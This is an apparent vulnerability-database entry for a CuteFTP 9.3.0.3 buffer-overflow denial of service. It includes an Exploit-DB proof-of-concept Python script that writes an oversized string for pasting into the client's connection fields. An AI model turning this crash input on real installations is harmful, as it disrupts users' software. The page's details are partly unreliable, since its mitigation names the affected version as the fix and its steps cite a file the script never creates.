header-logo
Suggest Exploit
vendor:
CuteFTP
by:
Ismael Nava
7.8
CVSS
HIGH
Denial of Service
119
CWE
Product Name: CuteFTP
Affected Version From: 9.3.0.3
Affected Version To: 9.3.0.3
Patch Exists: YES
Related CWE: n/a
CPE: a:globalscape:cuteftp:9.3.0.3
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: Windows 10 Home x64
2018

CuteFTP 9.3.0.3 – Denial of Service (PoC)

A buffer overflow vulnerability exists in CuteFTP 9.3.0.3 which can be exploited by malicious people to cause a DoS (Denial of Service). The vulnerability is caused due to a boundary error when handling specially crafted input. This can be exploited to cause a stack-based buffer overflow via an overly long, specially crafted string passed to the application when connecting to a malicious FTP server. Successful exploitation of this vulnerability may allow execution of arbitrary code.

Mitigation:

Upgrade to the latest version of CuteFTP 9.3.0.3 or later.
Source

Exploit-DB raw data:

# Exploit Title: CuteFTP 9.3.0.3 - Denial of Service (PoC)
# Date: 2018-11-05
# Exploit Author: Ismael Nava
# Vendor Homepage: https://www.globalscape.com/cuteftp
# Software Link: https://www.globalscape.com/cuteftp
# Version: 9.3.0.3
# Tested on: Windows 10 Home x64
# CVE : n/a

# STEPS
# Run the python exploit script, it will create a new .txt files
# Open the program CuteFTP
# Copy the content of the file "Cute.txt"
# Paste the content in the fields Host, Username and Password
# In the field "Hostname or IP" paste the content of the file "IP.txt"
# Click in Connect
# End :)

buffer = 'A' * 1000

try: 
    file = open("Cute.txt","w")
    file.write(buffer)
    file.close()

    print("Archive ready")
except:
    print("Archive no ready")